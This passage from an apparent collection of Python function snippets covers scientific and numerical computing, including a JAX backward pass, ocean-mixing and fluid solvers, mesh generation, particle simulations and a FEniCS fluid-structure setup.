Adds a small regularizer to improve conditioning when solving linear system\n pull_fg_0 = lambda vec: pull_fg(vec)[0] + ridge * jnp.sum(vec**2)\n vjp_gr = -jax.scipy.sparse.linalg.cg(pull_fg_0, jnp.concatenate(gr))[0]\n # Carries pullback onto original inputs, here geom, a and b.\n _, pull_geom_a_b = jax.vjp(foc_geom_a_b, geom, a, b)\n g_geom, g_a, g_b = pull_geom_a_b(vjp_gr)\n # First gradient are for threshold and norm_errors: we set them to None\n return None, None, g_geom, g_a, g_b", "def basiscond(self):\n nrmbasis_ = ctypes.c_double()\n nrminvbasis_ = ctypes.c_double()\n res = __library__.MSK_XX_basiscond(self.__nativep,ctypes.byref(nrmbasis_),ctypes.byref(nrminvbasis_))\n if res != 0:\n _,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)\n nrmbasis_ = nrmbasis_.value\n _nrmbasis_return_value = nrmbasis_\n nrminvbasis_ = nrminvbasis_.value\n _nrminvbasis_return_value = nrminvbasis_\n return (_nrmbasis_return_value,_nrminvbasis_return_value)", "def box_collision_info(self):\r\n position = np.zeros((self.Npart,3)) # antall part, dim, iterasjoner\r\n position[:,:] = np.random.uniform(0,1e-6, size = (self.Npart,3))\r\n velocity = np.zeros((self.Npart,3))\r\n velocity[:,:] = np.random.normal(0,self.sigma,size = (self.Npart,3))\r\n\r\n part_collided = 0\r\n part_escaped = 0\r\n momentum = 0\r\n\r\n print 'engine started'\r\n for i in xrange(1,self.n):\r\n #collision\r\n position += velocity*dt\r\n l_hole = position[:,0:2] > self.L/4\r\n h_hole = position[:,0:2] < (3*self.L)/4\r\n pos_xy = np.logical_and(l_hole, h_hole)\r\n pos_xy = np.logical_and(pos_xy[:,0], pos_xy[:,1])\r\n pos_z = position[:,2] < 0\r\n esc_part = np.logical_and(pos_z, pos_xy)\r\n\r\n #velocity[esc_part] = velocity[esc_part]\r\n part_escaped += np.sum(esc_part)\r\n\r\n for j in xrange(0,3):\r\n impact_wall_pos = np.logical_and(position[:,j] > 0,\r\n position[:,j] < self.L)\r\n velocity[np.logical_not(impact_wall_pos),j] = -velocity[\r\n np.logical_not(impact_wall_pos),j]\r\n\r\n\r\n if j == 0:\r\n part_collided += np.sum(np.logical_not(impact_wall_pos),j)\r\n momentum += np.sum(2*self.m*abs(velocity[np.logical_not(\r\n impact_wall_pos),j]))\r\n\r\n\r\n\r\n position[position < 0] = 0\r\n position[position >self.L] = self.L\r\n\r\n particle_collided = part_collided/2\r\n return position, velocity,part_escaped, impact_wall_pos, particle_collided, momentum", "def get_bforce_wm_ws_Gx_surf(self):\n\n [Ly,N] = self.b.shape\n z_u_w = self.grid_dict['z_u_w'] \n \n self.Gm1 = np.zeros([Ly])\n self.dGm1_dS = np.zeros([Ly]) \n self.Gt1 = np.zeros([Ly])\n self.dGt1_dS = np.zeros([Ly]) \n self.Bfsfc_bl = np.zeros([Ly])\n self.Av_bl = np.zeros([Ly])\n self.dAv_bl = np.zeros([Ly])\n \n #debugging\n self.wm_surf = np.zeros([Ly])\n self.ws_surf = np.zeros([Ly]) \n\n #---> j-loop\n for j in range(Ly): \n k_w = self.kbl[j] # KBL is \"new bl index after calling find_new_kbl()\n z_bl = z_u_w[j,N] - self.hbls[j]\n zscale = self.hbls[j] \n \n if self.swr_frac[j,k_w-1] > 0:\n Bfsfc = self.Bo[j] + self.Bosol[j] * ( 1. - self.swr_frac[j,k_w-1]\\\n * self.swr_frac[j,k_w] * ( z_u_w[j,k_w] - z_u_w[j,k_w-1] )\\\n / (self.swr_frac[j,k_w] * (z_u_w[j,k_w] - z_bl)\\\n + self.swr_frac[j,k_w-1] * (z_bl - z_u_w[j,k_w-1]) ))\n \n else:\n Bfsfc = self.Bo[j] + self.Bosol[j]\n \n # CALCUALTE TURBULENT VELOCITY SCALES\n wm,ws = self.lmd_wscale_wm_and_ws(Bfsfc,zscale,self.ustar[j],self.hbls[j])\n self.wm_surf[j] = wm\n self.ws_surf[j] = ws \n\n if self.LIMIT_UNSTABLE_ONLY:\n f1 = 5. * np.max([0,Bfsfc]) * self.vonKar / (self.ustar[j]**4+self.eps)\n else:\n f1 = 0\n\n \n cff = 1. / (z_u_w[j,k_w] - z_u_w[j,k_w-1])\n cff_up = cff * (z_bl - z_u_w[j,k_w])\n cff_dn = cff * (z_u_w[j,k_w] - z_bl)\n\n #MOMENTUM \n Av_bl = cff_up * self.Kv_old[j,k_w] + cff_dn * self.Kv_old[j,k_w-1]\n dAv_bl = cff * (self.Kv_old[j,k_w] - self.Kv_old[j,k_w-1])\n self.Av_bl[j] = Av_bl\n self.dAv_bl[j] = dAv_bl\n self.Gm1[j] = Av_bl / (self.hbls[j] * wm + self.eps)\n self.dGm1_dS[j] = np.min([0.,Av_bl*f1-dAv_bl/(wm+self.eps)]) \n\n #TEMPERATURE(BUOYANCY)\n At_bl = cff_up * self.Kt_old[j,k_w] + cff_dn * self.Kt_old[j,k_w-1]\n dAt_bl = cff * (self.Kt_old[j,k_w] - self.Kt_old[j,k_w-1])\n self.Gt1[j] = At_bl / (self.hbls[j] * ws + self.eps)\n self.dGt1_dS[j] = np.min([0.,At_bl*f1-dAt_bl/(ws+self.eps)]) \n\n self.Bfsfc_bl[j] = Bfsfc", "def build_rhs():\n\n def div(\n coeff_rho,\n momentum_x,\n momentum_y,\n momentum_z,\n ):\n \"\"\"Computes the divergence of the velocity field.\"\"\"\n # Compute the fourth order derivative of the pressure for the face\n # velocity correction.\n p_corr = (\n states['p']\n if self._params.enable_rhie_chow_correction else states['dp'])\n d4p_dx4 = self._kernel_op.apply_kernel_op_x(p_corr, 'k4d2x')\n d4p_dy4 = self._kernel_op.apply_kernel_op_y(p_corr, 'k4d2y')\n d4p_dz4 = self._kernel_op.apply_kernel_op_z(p_corr, 'k4d2z',\n 'k4d2zsh')\n\n # Compute velocity gradient based on interpolated values on cell faces.\n coeff_x = dt / (4. * coeff_rho * dx**2)\n du = self._kernel_op.apply_kernel_op_x(momentum_x, 'kDx')\n du_dx = [\n du_i / (2. * dx) + coeff_x * d4p_dx4_i\n for du_i, d4p_dx4_i in zip(du, d4p_dx4)\n ]\n\n coeff_y = dt / (4. * coeff_rho * dy**2)\n dv = self._kernel_op.apply_kernel_op_y(momentum_y, 'kDy')\n dv_dy = [\n dv_i / (2. * dy) + coeff_y * d4p_dy4_i\n for dv_i, d4p_dy4_i in zip(dv, d4p_dy4)\n ]\n\n coeff_z = dt / (4. * coeff_rho * dz**2)\n dw = self._kernel_op.apply_kernel_op_z(momentum_z, 'kDz', 'kDzsh')\n dw_dz = [\n dw_i / (2. * dz) + coeff_z * d4p_dz4_i\n for dw_i, d4p_dz4_i in zip(dw, d4p_dz4)\n ]\n\n return [\n du_dx_i + dv_dy_i + dw_dz_i\n for du_dx_i, dv_dy_i, dw_dz_i in zip(du_dx, dv_dy, dw_dz)\n ]\n\n def add_factor(\n v,\n factor,\n ):\n return [factor * v_i for v_i in v]\n\n b_terms = {\n _B_TERM_SOURCE_RHO: add_factor(src_rho, inv_dt),\n }\n if isinstance(rho_info, ConstantDensityInfo):\n b_terms.update({\n _B_TERM_DIV:\n add_factor(\n div(rho_info.rho, states['u'], states['v'], states['w']),\n inv_dt * rho_info.rho),\n _B_TERM_DRHO_DT: [\n tf.zeros_like(src_rho_i) for src_rho_i in src_rho\n ],\n })\n\n elif isinstance(rho_info, VariableDensityInfo):\n b_terms.update({\n _B_TERM_DIV:\n add_factor(\n div(1.0, states['rho_u'], states['rho_v'], states['rho_w']),\n inv_dt),\n _B_TERM_DRHO_DT:\n add_factor(rho_info.drho_dt, inv_dt),\n })\n\n else:\n raise ValueError('`rho_info` has to be either `ConstantDensityInfo` or '\n '`VariableDensityInfo`.')\n\n # pylint: disable=g-complex-comprehension\n return [(div_i + drho_dt_i - src_rho_i)\n for div_i, drho_dt_i, src_rho_i in zip(\n b_terms[_B_TERM_DIV],\n b_terms[_B_TERM_DRHO_DT],\n b_terms[_B_TERM_SOURCE_RHO],\n )], b_terms\n # pylint: enable=g-complex-comprehension", "def single_eval_boundary(fg_boundary, gt_boundary, bound_pix=0):\n assert np.atleast_3d(fg_boundary).shape[2] == 1\n\n from skimage.morphology import binary_dilation, disk\n\n fg_dil = binary_dilation(fg_boundary, disk(bound_pix))\n gt_dil = binary_dilation(gt_boundary, disk(bound_pix))\n\n # Get the intersection\n gt_match = gt_boundary * fg_dil\n fg_match = fg_boundary * gt_dil\n\n # Area of the intersection\n n_fg = np.sum(fg_boundary)\n n_gt = np.sum(gt_boundary)\n\n # % Compute precision and recall\n if n_fg == 0 and n_gt > 0:\n precision = 1\n recall = 0\n elif n_fg > 0 and n_gt == 0:\n precision = 0\n recall = 1\n elif n_fg == 0 and n_gt == 0:\n precision = 1\n recall = 1\n else:\n precision = np.sum(fg_match) / float(n_fg)\n recall = np.sum(gt_match) / float(n_gt)\n\n # Compute F meas\n # ure\n if precision + recall == 0:\n F = 0\n else:\n F = 2 * precision * recall / (precision + recall)\n\n return F, precision, recall", "def run(self, **kwargs):\r\n\r\n # Get the kwargs.\r\n cases = kwargs['case']\r\n if cases == 'all':\r\n cases = scr.pfile.case.keys()\r\n elif type(cases) is not list:\r\n cases = [cases]\r\n if 'rbm' in kwargs.keys():\r\n if kwargs['rbm'].lower() == 'yes':\r\n rbm = 1\r\n else:\r\n rbm = 0\r\n else:\r\n rbm = 0\r\n\r\n # Run all the requested cases.\r\n for c in cases:\r\n # Create the current case dictionary key.\r\n if c not in self.time.keys():\r\n self.time[c] = []\r\n if c not in self.u.keys():\r\n self.u[c] = []\r\n if c not in self.eta.keys():\r\n self.eta[c] = []\r\n\r\n # Determine the modal force vector.\r\n p_modal = modal_p(self.pfile.case[c], self.phi)\r\n\r\n # Determine the time parameters in the forcing function.\r\n grid = self.pfile.case[c]['grids'][0]\r\n self.time[c] = self.pfile.case[c][grid][:, 0]\r\n dt = self.pfile.case[c]['dt']\r\n\r\n # Add 100 seconds at the end of the forcing function for ring down.\r\n add_time = [(20, 0.01), (80, 0.5)]\r\n for at in add_time:\r\n new_time = np.arange(self.time[c][-1] + dt, self.time[c][-1] + at[0], at[1])\r\n self.time[c] = np.append(self.time[c], new_time)\r\n new_p_modal = np.zeros([self.phi.num_modes, new_time.size])\r\n p_modal = np.append(p_modal, new_p_modal, axis=1)\r\n\r\n # Integrate the modal EOM using Reccurence Formulas:\r\n # etadd + 2 * zeta omn * etad + omn**2 * eta = P\r\n eta0 = np.zeros_like(p_modal)\r\n etad0 = np.zeros_like(p_modal)\r\n [self.eta[c], etad] = rf_mdof(self.time[c], p_modal, self.eig.eigenvalues,\r\n np.multiply(2 * np.pi, self.eig.frequency), self.zeta,\r\n eta0, etad0)\r\n\r\n # Remove rigid body modes unless requested not to.\r\n if rbm == 0:\r\n self.eta[c][0:6, :] = 0.0\r\n\r\n # Recover the desired responses with superposition of modes using the LTM\r\n self.u[c] = self.ltm.dtm @ self.eta[c]\r\n\r\n # Perform the required RSS set out in the HWLIST.\r\n self.rss(c)", "def rectangular_periodic(m_g, n_g, len1_g=1.0, len2_g=1.0, origin_g = (0.0, 0.0)):\n\n processor = 0\n numproc = 1\n\n\n n = n_g\n m_low = -1\n m_high = m_g +1\n\n m = m_high - m_low\n\n delta1 = float(len1_g)/m_g\n delta2 = float(len2_g)/n_g\n\n len1 = len1_g*float(m)/float(m_g)\n len2 = len2_g\n origin = ( origin_g[0]+float(m_low)/float(m_g)*len1_g, origin_g[1] )\n\n #Calculate number of points\n Np = (m+1)*(n+1)\n\n class VIndex(object):\n\n def __init__(self, n,m):\n self.n = n\n self.m = m\n\n def __call__(self, i,j):\n return j+i*(self.n+1)\n\n class EIndex(object):\n\n def __init__(self, n,m):\n self.n = n\n self.m = m\n\n def __call__(self, i,j):\n return 2*(j+i*self.n)\n\n\n I = VIndex(n,m)\n E = EIndex(n,m)\n\n points = num.zeros( (Np,2), float)\n\n for i in range(m+1):\n for j in range(n+1):\n\n points[I(i,j),:] = [i*delta1 + origin[0], j*delta2 + origin[1]]\n\n #Construct 2 triangles per rectangular element and assign tags to boundary\n #Calculate number of triangles\n Nt = 2*m*n\n\n\n elements = num.zeros( (Nt,3), int)\n boundary = {}\n Idgl = []\n Idfl = []\n Idgr = []\n Idfr = []\n\n full_send_dict = {}\n ghost_recv_dict = {}\n nt = -1\n for i in range(m):\n for j in range(n):\n\n i1 = I(i,j+1)\n i2 = I(i,j)\n i3 = I(i+1,j+1)\n i4 = I(i+1,j)\n\n #Lower Element\n nt = E(i,j)\n if i == 0:\n Idgl.append(nt)\n\n if i == 1:\n Idfl.append(nt)\n\n if i == m-2:\n Idfr.append(nt)\n\n if i == m-1:\n Idgr.append(nt)\n\n if i == m-1:\n if processor == numproc-1:\n boundary[nt, 2] = 'right'\n else:\n boundary[nt, 2] = 'ghost'\n\n if j == 0:\n boundary[nt, 1] = 'bottom'\n elements[nt,:] = [i4,i3,i2]\n\n #Upper Element\n nt = E(i,j)+1\n if i == 0:\n Idgl.append(nt)\n\n if i == 1:\n Idfl.append(nt)\n\n if i == m-2:\n Idfr.append(nt)\n\n if i == m-1:\n Idgr.append(nt)\n\n if i == 0:\n if processor == 0:\n boundary[nt, 2] = 'left'\n else:\n boundary[nt, 2] = 'ghost'\n if j == n-1:\n boundary[nt, 1] = 'top'\n elements[nt,:] = [i1,i2,i3]\n\n Idfl.extend(Idfr)\n Idgr.extend(Idgl)\n\n Idfl = num.array(Idfl, int)\n Idgr = num.array(Idgr, int)\n\n full_send_dict[processor] = [Idfl, Idfl]\n ghost_recv_dict[processor] = [Idgr, Idgr]\n\n\n return points, elements, boundary, full_send_dict, ghost_recv_dict", "def eval_damping():\n # Environment\n env = WAMBallInCupSim(num_dof=7, max_steps=1500)\n\n # Policy (random init)\n policy_hparam = dict(num_feat_per_dim=12, bounds=(np.array([0.0]), np.array([1.0])))\n policy = DualRBFLinearPolicy(env.spec, policy_hparam, dim_mask=2)\n\n # Do the rolllouts\n t_all = []\n qpos_all = []\n dp_vals = [0.0, 0.01, 0.1, 0.5, 1.0]\n print_cbt(f\"Run policy for damping coefficients: {dp_vals}\")\n for dpv in dp_vals:\n env.reset(\n domain_param=dict(\n joint_1_damping=dpv,\n joint_2_damping=dpv,\n joint_3_damping=dpv,\n joint_4_damping=dpv,\n joint_5_damping=dpv,\n joint_6_damping=dpv,\n joint_7_damping=dpv,\n )\n )\n ro = rollout(env, policy, render_mode=RenderMode(video=False), eval=True)\n t_all.append(ro.time[:-1])\n qpos_all.append(ro.env_infos[\"qpos\"])\n\n # Plot\n fig, ax = plt.subplots(nrows=env.num_dof, sharex=\"all\", figsize=(16, 7))\n for i, idx_joint in enumerate([dof for dof in range(env.num_dof)]):\n ax[i].set_prop_cycle(color=plt.get_cmap(\"cividis\")(np.linspace(0, 1, env.num_dof)))\n ax[i].set_ylabel(f\"joint {idx_joint+1} pos [rad]\")\n for j in range(len(dp_vals)):\n ax[i].plot(t_all[j], qpos_all[j][:, idx_joint], ls=\"--\", label=f\"d = {dp_vals[j]}\")\n if i == 0:\n ax[i].legend(ncol=len(dp_vals))\n ax[-1].set_xlabel(\"time [s]\")\n plt.suptitle(\"Evaluation of joint damping coefficients\")\n plt.show()", "def newton_method_bidirectional(f, bnd1, bnd2, Ep, step):\n\n while True:\n step = step + 1\n\n # print(\"bnd1=\",bnd1,\" and bnd2=\",bnd2)\n\n h_bnd1 = f(bnd1) / derivative(f, bnd1)\n bnd1 = bnd1 - h_bnd1\n if (decide(abs(h_bnd1) <= Ep)):\n # print(\"Root in Approximation: \",bnd1)\n return step\n\n h_bnd2 = f(bnd2) / derivative(f, bnd2)\n bnd2 = bnd2 - h_bnd2\n if (decide(abs(h_bnd2) <= Ep)):\n # print(\"Root in Approximation: \",bnd2)\n return step", "def compute_refl(self, step, borders,obstacle):\n\n r = self.radius\n v = self.velocity\n x = self.position\n projx = step*abs(np.dot(v,np.array([1.,0.])))\n projy = step*abs(np.dot(v,np.array([0.,1.])))\n\n a = pygame.Rect(0,0,borders[3][0],borders[3][0])\n b = pygame.Rect(0,borders[0][1]+borders[0][3],borders[3][0],borders[3][1]+borders[3][3])\n c = pygame.Rect(borders[2][0]+borders[2][2],0,borders[3][0],borders[3][0])\n d = pygame.Rect(borders[3][0]+borders[3][2],borders[1][1]+borders[1][3],borders[3][0],borders[3][0])\n\n if(a.collidepoint(*self.position) or b.collidepoint(*self.position) or c.collidepoint(*self.position) or d.collidepoint(*self.position)):\n self.vafter *= 0\n self.delete = True\n\n\n\n\n else:\n if (abs(x[0])-r -borders[0][0]-borders[0][2] < projx ) or (abs(borders[1][0]- x[0])-r < projx):\n self.vafter[0] *= -1\n\n if abs(x[1])-r -(borders[2][1]+borders[2][3]) < projy or abs(borders[3][1]-x[1])-r < projy:\n self.vafter[1] *= -1.\n\n if obstacle != None:\n obs = pygame.Rect(*obstacle)\n if obs.collidepoint(x[0] + r,x[1]):\n self.vafter[0] = -20\n if obs.collidepoint(x[0] - r,x[1]):\n self.vafter[0] = 20\n if obs.collidepoint(x[0],x[1]- r):\n self.vafter[1] = 20\n if obs.collidepoint(x[0], x[1]+ r):\n self.vafter[1] = -20", "def assemble_matrices(self):\n \n #Pointer reassignment for convenience\n N = self.ngrids\n\n #Begin with a linked-list data structure for the transmissibilities,\n #and one-dimenstional arrays for the diagonal of B and the flux vector\n T = lil_matrix((N, N), dtype=np.double)\n B = np.zeros(N, dtype=np.double)\n Q = np.zeros(N, dtype=np.double)\n\n #Read in boundary condition types and values\n bcs = self.input_data['boundary conditions']\n bc_type_1 = bcs['left']['type'].lower()\n bc_type_2 = bcs['right']['type'].lower()\n bc_value_1 = bcs['left']['value']\n bc_value_2 = bcs['right']['value']\n \n #Loop over all grid cells\n for i in range(N):\n\n #Apply left BC\n if i == 0:\n T[i, i+1] = -self.compute_transmissibility(i, i + 1)\n\n if bc_type_1 == 'neumann':\n T[i, i] = T[i,i] - T[i, i+1]\n elif bc_type_1 == 'dirichlet':\n #Computes the transmissibility of the ith block\n T0 = self.compute_transmissibility(i, i)\n T[i, i] = T[i,i] - T[i, i+1] + 2.0 * T0\n Q[i] = 2.0 * T0 * bc_value_1\n else:\n pass #TODO: Add error checking here if no bc is specified\n\n #Apply right BC\n elif i == (N - 1):\n T[i, i-1] = -self.compute_transmissibility(i, i - 1)\n\n if bc_type_2 == 'neumann':\n T[i, i] = T[i,i] - T[i, i-1]\n elif bc_type_2 == 'dirichlet':\n #Computes the transmissibility of the ith block\n T0 = self.compute_transmissibility(i, i)\n T[i, i] = T[i, i] - T[i, i-1] + 2.0 * T0\n Q[i] = 2.0 * T0 * bc_value_2\n else:\n pass #TODO:Add error checking here if no bc is specified\n\n #If there is no boundary condition compute interblock transmissibilties\n else:\n T[i, i-1] = -self.compute_transmissibility(i, i-1)\n T[i, i+1] = -self.compute_transmissibility(i, i+1)\n T[i, i] = (self.compute_transmissibility(i, i-1) +\n self.compute_transmissibility(i, i+1))\n\n #Compute accumulations\n B[i] = self.compute_accumulation(i)\n\n #If constant-rate wells are present, add them to the flux vector\n if self.rate_well_grids is not None:\n Q[self.rate_well_grids] += self.rate_well_values\n\n \n #Return sparse data-structures\n return (T.tocsr(), \n csr_matrix((B, (np.arange(N), np.arange(N))), shape=(N,N)), \n Q)", "def convergence_check(self):\n air = self.air_alias.val\n flue_gas = self.fuel_alias.val + '_fg'\n fuel = self.fuel_alias.val\n\n for c in self.outl:\n if not c.fluid.val_set[air]:\n if c.fluid.val[air] > 0.95:\n c.fluid.val[air] = 0.95\n if c.fluid.val[air] < 0.5:\n c.fluid.val[air] = 0.5\n\n if not c.fluid.val_set[flue_gas]:\n if c.fluid.val[flue_gas] > 0.5:\n c.fluid.val[flue_gas] = 0.5\n if c.fluid.val[flue_gas] < 0.05:\n c.fluid.val[flue_gas] = 0.05\n\n if not c.fluid.val_set[fuel]:\n if c.fluid.val[fuel] > 0:\n c.fluid.val[fuel] = 0\n\n c.target.propagate_fluid_to_target(c, c.target)\n\n for i in self.inl:\n if i.m.val_SI < 0 and not i.m.val_set:\n i.m.val_SI = 0.01\n\n for c in self.outl:\n if c.m.val_SI < 0 and not c.m.val_set:\n c.m.val_SI = 10\n c.target.propagate_fluid_to_target(c, c.target)\n\n if self.lamb.val < 1 and not self.lamb.is_set:\n self.lamb.val = 2", "def loopVehicle( initPos = (40, 40, 0), theta = 3/2*pi, phi = 0, delta = 0.5, W = 4, alpha = 0):\r\n \r\n initAxis = (cos(theta)*cos(phi), sin(theta)*cos(phi), sin(phi))\r\n vehicle = vs.box(pos=initPos, size=(W,W,0.2), color = clr.green, axis = initAxis,\r\n make_trail=True)\r\n vehicle.trail_object.radius = 0.2\r\n vehicle.velocity = vs.vector(initAxis)\r\n deltat = delta\r\n vscale = 8\r\n varr = vs.arrow(pos=vehicle.pos, axis=vscale*vehicle.velocity, color=clr.yellow)\r\n\r\n while True:\r\n vs.rate(1000)\r\n\r\n orthV = makeHoriVector(theta+pi/2)\r\n orthV2 = makeVector(theta, phi+pi/2)\r\n lSensorPos = tuple(int(x) for x in (vehicle.pos+orthV*W/2).astuple())\r\n rSensorPos = tuple(int(x) for x in (vehicle.pos-orthV*W/2).astuple())\r\n #print(rSensorPos)\r\n\r\n if (getDensity(lSensorPos) > getDensity(rSensorPos)):\r\n theta = theta + pi/180\r\n elif getDensity(lSensorPos) < getDensity(rSensorPos):\r\n theta = theta - pi/180\r\n\r\n if (getDensity(lSensorPos) + getDensity(rSensorPos))/2 > thre_den:\r\n return\r\n\r\n vehicle.velocity = makeVector(theta, phi)\r\n \r\n vehicle.pos = vehicle.pos+vehicle.velocity*deltat*sigmoid(getDensity(lSensorPos)+getDensity(rSensorPos), alpha)\r\n vehicle.axis = vehicle.velocity\r\n vehicle.size=(W,W,0.2)\r\n\r\n varr.pos = vehicle.pos\r\n varr.axis = vehicle.velocity*vscale", "def calculateExteriorElementBoundaryCoefficients(self):\n #\n #get u and grad(u) at the quadrature points\n #\n for ci in range(self.nc):\n self.u[ci].getValuesGlobalExteriorTrace(self.ebqe[('v',ci)],self.ebqe[('u',ci)])\n if self.ebqe.has_key(('grad(u)',ci)):\n self.u[ci].getGradientValuesGlobalExteriorTrace(self.ebqe[('grad(v)',ci)],self.ebqe[('grad(u)',ci)])\n #\n #get coefficients at the element boundary quadrature points\n #\n self.coefficients.evaluate(t = self.timeIntegration.t, c = self.ebqe)\n #\n #time integration, handled directly in ELLAM formulation\n #\n #ignore numerical flux for now\n #if self.numericalFlux != None:\n # self.numericalFlux.calculateExteriorNumericalFlux(self.inflowFlag,self.q,self.ebqe)\n #flux boundary conditions specified through advective flux\n for ci,fbcObject in self.fluxBoundaryConditionsObjectsDict.iteritems():\n for t,g in fbcObject.advectiveFluxBoundaryConditionsDict.iteritems():\n self.ebqe[('advectiveFlux_bc',ci)][t[0],t[1]] = g(self.ebqe[('x')][t[0],t[1]],self.timeIntegration.t)\n self.ebqe[('advectiveFlux_bc_flag',ci)][t[0],t[1]] = 1", "def __init__(self, mesh, bndry, interface, dt, theta, v_max, lambda_s, mu_s, rho_s, \n mu_f, rho_f, result, *args, **kwargs):\n\n self.mesh = mesh\n self.dt = Constant(dt)\n self.theta = theta\n self.t = 0.0\n self.v_max = v_max\n\n self.mu_f = mu_f\n self.rho_f = rho_f\n self.lambda_s = lambda_s\n self.mu_s = mu_s\n self.rho_s = rho_s\n \n self.bndry = bndry\n self.interface = interface\n\n # bounding box tree\n self.bb = BoundingBoxTree()\n self.bb.build(self.mesh)\n\n # Define finite elements\n eV = VectorElement(\"CG\", mesh.ufl_cell(), 2)\t\t# velocity element\n eB = VectorElement(\"Bubble\", mesh.ufl_cell(), mesh.geometry().dim()+1) # Bubble element\n eU = VectorElement(\"CG\", mesh.ufl_cell(), 2)\t\t# displacement element\n eP = FiniteElement(\"DG\", mesh.ufl_cell(), 1)\t\t# pressure element\n\n eW = MixedElement([eV, eB, eU, eB, eP]) # final mixed element\n W = FunctionSpace(self.mesh, eW) # mixed space\n self.W = W\n self.V = FunctionSpace(self.mesh, eV)\n\n # Set boundary conditions\n self.v_in = Expression((\"t<2.0? 0.5*(1.0 - cos(0.5*pi*t))*v_max*4/(gW*gW)*(x[1]*(gW - x[1])): \\\n v_max*4/(gW*gW)*(x[1]*(gW - x[1]))\", \"0.0\"),\n degree = 2, v_max = Constant(self.v_max), gW = Constant(gW), t = self.t)\n\n #info(\"Expression set.\")\n bc_v_in = DirichletBC(self.W.sub(0), self.v_in, bndry, _INFLOW)\n bc_v_walls = DirichletBC(self.W.sub(0), Constant((0.0, 0.0)), bndry, _WALLS)\n bc_v_circle = DirichletBC(self.W.sub(0), Constant((0.0, 0.0)), bndry, _CIRCLE)\n bc_u_in = DirichletBC(self.W.sub(2), Constant((0.0, 0.0)), bndry, _INFLOW)\n bc_u_circle = DirichletBC(self.W.sub(2), Constant((0.0, 0.0)), bndry, _CIRCLE)\n bc_u_walls = DirichletBC(self.W.sub(2), Constant((0.0, 0.0)), bndry, _WALLS)\n bc_u_out = DirichletBC(self.W.sub(2), Constant((0.0, 0.0)), bndry, _OUTFLOW)\n self.bcs = [bc_v_in, bc_v_walls, bc_v_circle, bc_u_in, bc_u_walls, bc_u_circle, bc_u_out]\n\n #info(\"Mesh BC.\")\n bc_mesh = DirichletBC(self.W.sub(2), Constant((0.0, 0.0)), interface, _FSI)\n self.bcs_mesh = [bc_mesh]\n\n\n #info(\"Normal and Circumradius.\")\n self.n = FacetNormal(self.mesh)\n self.h = Circumradius(self.mesh)\n I = Identity(self.W.mesh().geometry().dim())\n\n # Define functions\n self.w = Function(self.W) # solution to current time step\n self.w0 = Function(self.W) # solution from previous time step\n\n (v__, bv_, u__, bu_, p_) = TestFunctions(self.W)\n\n # sum bubble elements with corresponding Lagrange elements\n v_ = v__ + bv_\n u_ = u__ + bu_\n (v, bv, u, bu, self.p) = split(self.w)\n self.v = v + bv\n self.u = u + bu\n (v0, bv0, u0, bu0, self.p0) = split(self.w0)\n self.v0 = v0 + bv0\n self.u0 = u0 + bu0\n\n\n # define deformation gradient, Jacobian\n self.FF = I + grad(self.u)\n self.FF0 = I + grad(self.u0)\n self.JJ = det(self.FF)\n self.JJ0 = det(self.FF0)\n\n # write ALE mesh movement \n self.gamma = 9.0/8.0\n h = CellVolume(self.mesh)**(self.gamma)\n E = Constant(1.0)\n\n E_mesh = E/h\n nu_mesh = Constant(-0.02)\n\n mu_mesh = E_mesh/(2*(1.0+nu_mesh))\n lambda_mesh = (nu_mesh*E_mesh)/((1+nu_mesh)*(1-2*nu_mesh))\n\n F_mesh = inner(mu_mesh*2*sym(grad(self.u)), grad(u_))*dx(0) \\\n + lambda_mesh*inner(div(self.u), div(u_))*dx(0)\n\n\n # define referential Grad and Div shortcuts\n def Grad(f, F): return dot( grad(f), inv(F) )\n def Div(f, F): return tr( Grad(f, F) )\n\n # approximate time derivatives\n du = (1.0/self.dt)*(self.u - self.u0)\n dv = (1.0/self.dt)*(self.v - self.v0)\n\n # compute velocuty part of Cauchy stress tensor for fluid\n self.T_f = -self.p*I + 2*self.mu_f*sym(Grad(self.v, self.FF))\n self.T_f0 = -self.p*I + 2*self.mu_f*sym(Grad(self.v0, self.FF0))\n\n # Compute 1st Piola-Kirhhoff tensro for fluid \n # - for computing surface integrals for forces in postprocessing \n self.S_f = self.JJ *self.T_f*inv(self.FF).T\n \n # write equations for fluid\n a_fluid = inner(self.T_f , Grad(v_, self.FF))*self.JJ*dx(0) \\\n - inner(self.p, Div(v_, self.FF))*self.JJ*dx(0) \\\n + inner(self.rho_f*Grad(self.v, self.FF )*(self.v - du), v_)*self.JJ*dx(0)\n a_fluid0 = inner(self.T_f0, Grad(v_, self.FF0))*self.JJ0*dx(0) \\\n - inner(self.p, Div(v_, self.FF))*self.JJ*dx(0) \\\n + inner(self.rho_f*Grad(self.v0, self.FF0)*(self.v0 - du), v_)*self.JJ0*dx(0)\n\n b_fluid = inner(Div( self.v, self.FF ), p_)*self.JJ*dx(0)\n b_fluid0 = inner(Div( self.v, self.FF ), p_)*self.JJ*dx(0)\n\n self.F_fluid = (self.theta*self.JJ+(1.0 - self.theta)*self.JJ0)*self.rho_f*inner(dv, v_)*dx(0)\\\n + self.theta*(a_fluid + b_fluid) + (1.0 - self.theta)*(a_fluid0 + b_fluid0) \\\n + F_mesh\n\n # compute 1st Piola-Kirchhoff tensor for solid (St. Vennant - Kirchhoff model)\n B_s = self.FF.T *self.FF\n B_s0 = self.FF0.T*self.FF0\n S_s = self.FF *(0.5*self.lambda_s*tr(B_s - I)*I + self.mu_s*(B_s - I))\n S_s0 = self.FF0*(0.5*self.lambda_s*tr(B_s0 - I)*I + self.mu_s*(B_s0 - I))\n\n # write equation for solid\n alpha = Constant(1.0) # Constant(1e10) #\n self.F_solid = rho_s*inner(dv, v_)*dx(1) \\\n + self.theta*inner(S_s , grad(v_))*dx(1) + (1.0 - self.theta)*inner(S_s0, grad(v_))*dx(1) \\\n + alpha*inner(du - (self.theta*self.v + (1.0 - self.theta)*self.v0), u_)*dx(1)\n\n\n dF_solid = derivative(self.F_solid, self.w)\n dF_fluid = derivative(self.F_fluid, self.w)\n\n self.problem = Problem(self.F_fluid, self.F_solid, dF_fluid, dF_solid, self.bcs_mesh, self.bcs)\n self.solver = NewtonSolver()\n\n # configure solver parameters\n self.solver.parameters['relative_tolerance'] = 1e-6\n self.solver.parameters['maximum_iterations'] = 15\n self.solver.parameters['linear_solver'] = 'mumps'\n\n # create files for saving\n if my_rank == 0:\n if not os.path.exists(result):\n os.makedirs(result)\n self.vfile = XDMFFile(\"%s/velocity.xdmf\" % result)\n self.ufile = XDMFFile(\"%s/displacement.xdmf\" % result)\n self.pfile = 